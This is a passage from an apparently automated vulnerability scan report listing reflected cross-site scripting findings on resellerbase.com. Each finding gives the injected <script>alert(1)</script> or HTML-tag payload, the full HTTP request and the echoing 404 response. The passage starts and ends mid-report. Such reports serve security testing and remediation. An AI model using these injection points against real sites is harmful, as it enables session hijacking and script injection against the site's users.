<p>The requested URL /detail/14e5351<script>alert(1)</script>615983e18b7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1189. http://www.resellerbase.com/detail/14/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 40972<script>alert(1)</script>2450c37d473 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes40972<script>alert(1)</script>2450c37d473/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes40972<script>alert(1)</script>2450c37d473/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1190. http://www.resellerbase.com/detail/14/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fa479<script>alert(1)</script>1b0c38ea23e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmosfa479<script>alert(1)</script>1b0c38ea23e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmosfa479<script>alert(1)</script>1b0c38ea23e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1191. http://www.resellerbase.com/detail/14/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f0ecf<script>alert(1)</script>968814fd93a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/search.phpf0ecf<script>alert(1)</script>968814fd93a?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/search.phpf0ecf<script>alert(1)</script>968814fd93a?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1192. http://www.resellerbase.com/detail/14/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 5b717<a>181bd3bc28 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/kosmos/search.php?keyword=search...&Submit3=Search5b717<a>181bd3bc28&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/search.php?keyword=search...&Submit3=Search5b717<a>181bd3bc28&opt=2 was not found on this server.</p>
...[SNIP]...

2.1193. http://www.resellerbase.com/detail/14/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 65b06<a>677dde48bf4 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/kosmos/search.php?keyword=search...65b06<a>677dde48bf4&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/search.php?keyword=search...65b06<a>677dde48bf4&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1194. http://www.resellerbase.com/detail/14/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a64e8<script>alert(1)</script>740f4b256f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&a64e8<script>alert(1)</script>740f4b256f9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&a64e8<script>alert(1)</script>740f4b256f9=1 was not found on this server.</p>
...[SNIP]...

2.1195. http://www.resellerbase.com/detail/14/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ea340<a>758ed83ba2e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ea340<a>758ed83ba2e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ea340<a>758ed83ba2e was not found on this server.</p>
...[SNIP]...

2.1196. http://www.resellerbase.com/detail/14/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f304<script>alert(1)</script>c2fe9c267a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8f304<script>alert(1)</script>c2fe9c267a9/14/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8f304<script>alert(1)</script>c2fe9c267a9/14/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1197. http://www.resellerbase.com/detail/14/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d945<script>alert(1)</script>a397b260f1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/143d945<script>alert(1)</script>a397b260f1c/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/143d945<script>alert(1)</script>a397b260f1c/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1198. http://www.resellerbase.com/detail/14/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7975a<script>alert(1)</script>362d6fc477b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes7975a<script>alert(1)</script>362d6fc477b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes7975a<script>alert(1)</script>362d6fc477b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1199. http://www.resellerbase.com/detail/14/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2dae0<script>alert(1)</script>647fe07d29f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/search.php2dae0<script>alert(1)</script>647fe07d29f?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/search.php2dae0<script>alert(1)</script>647fe07d29f?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1200. http://www.resellerbase.com/detail/14/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d94d2<a>e1e62fc273 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/search.php?keyword=search...&Submit3=Searchd94d2<a>e1e62fc273&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/search.php?keyword=search...&Submit3=Searchd94d2<a>e1e62fc273&opt=2 was not found on this server.</p>
...[SNIP]...

2.1201. http://www.resellerbase.com/detail/14/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 9fb89<a>46c98aa203 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/search.php?keyword=search...9fb89<a>46c98aa203&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/search.php?keyword=search...9fb89<a>46c98aa203&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1202. http://www.resellerbase.com/detail/14/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e5dc3<script>alert(1)</script>e9833f44663 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/search.php?keyword=search...&Submit3=Search&opt=2&e5dc3<script>alert(1)</script>e9833f44663=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/search.php?keyword=search...&Submit3=Search&opt=2&e5dc3<script>alert(1)</script>e9833f44663=1 was not found on this server.</p>
...[SNIP]...

2.1203. http://www.resellerbase.com/detail/14/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 93110<a>38040c1cffe was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/search.php?keyword=search...&Submit3=Search&opt=293110<a>38040c1cffe HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/search.php?keyword=search...&Submit3=Search&opt=293110<a>38040c1cffe was not found on this server.</p>
...[SNIP]...

2.1204. http://www.resellerbase.com/detail/15/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 848cb<script>alert(1)</script>2a943dc5906 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail848cb<script>alert(1)</script>2a943dc5906/15/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail848cb<script>alert(1)</script>2a943dc5906/15/ was not found on this server.</p>
...[SNIP]...

2.1205. http://www.resellerbase.com/detail/15/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4287e<script>alert(1)</script>24ec4078911 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/154287e<script>alert(1)</script>24ec4078911/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/154287e<script>alert(1)</script>24ec4078911/ was not found on this server.</p>
...[SNIP]...

2.1206. http://www.resellerbase.com/detail/15/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 86922<script>alert(1)</script>9e0437d7a30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/?86922<script>alert(1)</script>9e0437d7a30=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/?86922<script>alert(1)</script>9e0437d7a30=1 was not found on this server.</p>
...[SNIP]...

2.1207. http://www.resellerbase.com/detail/15/iwebtrack-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/iwebtrack-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a8a10<script>alert(1)</script>8f6b4773c51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila8a10<script>alert(1)</script>8f6b4773c51/15/iwebtrack-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

